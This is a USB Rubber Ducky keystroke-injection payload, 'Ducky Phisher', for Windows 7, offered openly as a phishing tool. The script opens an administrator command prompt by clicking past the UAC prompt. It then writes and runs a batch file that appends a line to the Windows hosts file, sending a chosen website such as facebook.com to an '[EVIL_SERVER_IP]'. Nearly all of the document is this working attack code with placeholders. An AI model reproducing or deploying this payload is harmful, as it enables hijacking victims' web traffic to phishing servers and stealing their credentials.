Ducky Phisher

Author: Koryusai-Kun (Mad props to darren's UAC bypass code)
Duckencoder: 1.2
Target: Windows 7
Description: Used for phishing websites, read the REM in the code.
 REM Author: .:Koryusai-Kun:.
 REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows
 REM Description: so when the user types into there web browser for example www.facebook.com it
 REM Description: insted of going to the proper ip it gose to the one in the host file your evil one.
 REM Description: you need to add the www. version and with out it as well.
 REM ---[Start CMD as administrator]-----------------------
 GUI
 DELAY 50
 STRING cmd
 DELAY 150
 MENU
 DELAY 75
 STRING a
 ENTER
 DELAY 200
 LEFT
 ENTER
 STRING cls
 ENTER
 REM ---[END]----------------------------------------------
 DELAY 300
 REM ---[Inject into the host file]------------------------
 STRING copy con inject.bat
 ENTER
 STRING SET NEWLINE=^& echo.
 ENTER
 ENTER
 STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
 ENTER
 STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
 ENTER
 ENTER
 STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
 ENTER
 STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
 ENTER
 CONTROL z
 ENTER
 STRING inject.bat
 ENTER
 REM ---[END]----------------------------------------------
 DELAY 200
 STRING exit
 ENTER